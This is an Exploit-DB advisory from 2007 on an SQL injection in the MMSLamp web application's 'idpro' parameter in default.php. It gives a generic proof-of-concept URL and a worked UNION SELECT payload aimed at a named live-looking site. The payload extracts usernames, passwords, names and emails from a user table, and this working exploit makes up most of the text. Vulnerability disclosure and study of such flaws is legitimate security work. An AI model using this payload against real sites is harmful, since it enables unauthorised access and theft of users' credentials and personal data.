MMSLamp - 'idpro' SQL Injection

EDB-ID:

4776


Author:

x0kster

Type:

webapps


Platform:

PHP

Date:

2007-12-23


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Name            :  mmsLamp SQL Injection Vulnerability.
Author          :  x0kster
Email           :  x0kster@gmail.com
Script Page     :  http://www.brand039.com/?service=prodotti_dettaglio&idpro=4
Date            :  22/12/2007
Bug in          :  default.php
PoC             :  http://site.com/default.php?service=prodotti_dettaglio&idpro=[SQL]

Example: 

http://www.brand039.com/default.php?service=prodotti_dettaglio&idpro=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(username,0x3a,password,0x3a,nome,0x3a,cognome,0x3a,azienda,0x3a,email),20,21,22+from+mms_extranet_utenti+where+id=1/*

# milw0rm.com [2007-12-23]